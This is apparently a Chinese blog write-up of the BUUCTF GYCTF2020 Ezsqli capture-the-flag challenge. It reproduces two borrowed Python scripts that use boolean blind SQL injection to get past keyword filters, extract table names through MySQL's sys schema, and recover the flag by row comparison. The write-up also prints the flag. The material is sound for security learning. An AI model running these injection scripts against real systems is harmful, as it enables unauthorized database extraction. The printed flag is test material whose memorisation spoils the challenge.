54,【4】BUUCTF WEB GYCTF2020Ezsqli

进入靶场

吓我一跳,但凡放个彭于晏我都不说啥了

提交个1看看

1 and 1=1

1'#

还尝试了很多,不过都被过滤了,头疼

看看别人的WP

竟然要写代码去跑!!!,不会啊,先用别人的代码吧,后续一定去学

第一个代码爆出表名

php 复制代码
from turtle import right
import requests
import time

url = "http://..........."
table_name = ""
i = 0

while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        mid = (letf + right) // 2
        payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"
        data = {"id": payload}
        res = requests.post(url=url, data=data).text
        if "Nu1L" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        table_name += chr(letf)
        time.sleep(0.2)
        print(table_name)
    else:
        break

得到表名 giers233333333333333,f1ag_1s_h3r3_hhhhh

第二个代码通过表名爆出flag

php 复制代码
import requests
import time
 
 
url = "http://........."
flag = ""
i = 0
 
 
while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        s = flag
        mid = (letf+right) // 2
        s = s + chr(mid)
        payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"
        data = {"id":payload}
        res = requests.post(url=url,data=data).text
        if "Nu1L" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        flag += chr(letf-1)
        print(flag)
        time.sleep(0.2)
    else:
        break

得到FLAG{E6AC8B59-EC60-4BC1-A3C9-C6B770B889CE}

即flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}

笔记

学习python脚本怎么写

相关推荐
于小汐在咯12 分钟前
词根学习笔记 | Agri系列
笔记·学习
霜绛42 分钟前
Unity:Json笔记——Json文件格式、JsonUtlity序列化和反序列化
学习·unity·json·游戏引擎
摇滚侠1 小时前
Spring Boot 3零基础教程,Spring Intializer,笔记05
spring boot·笔记·spring
Jabes.yang2 小时前
Java求职面试实战:从Spring Boot到微服务架构的技术探讨
java·数据库·spring boot·微服务·面试·消息队列·互联网大厂
聪明的笨猪猪2 小时前
Java Redis “高可用 — 主从复制”面试清单(含超通俗生活案例与深度理解)
java·经验分享·笔记·面试
我命由我123452 小时前
Excel - Excel 列出一列中所有不重复数据
经验分享·学习·职场和发展·word·powerpoint·excel·职场发展
摇滚侠2 小时前
Spring Boot 3零基础教程,Demo小结,笔记04
java·spring boot·笔记
璞致电子2 小时前
fpga开发板ZYNQ 璞致 PZ7010/7020 邮票孔核心板简介-ZYNQ7000系列小系统学习板
linux·嵌入式硬件·学习·fpga开发·fpga·fpga开发板·xilinx开发板
阿巴~阿巴~3 小时前
Redis 核心文件、命令与操作指南
数据库·redis·缓存·客户端·服务端
koping_wu3 小时前
【Redis】用Redis实现分布式锁、乐观锁
数据库·redis·分布式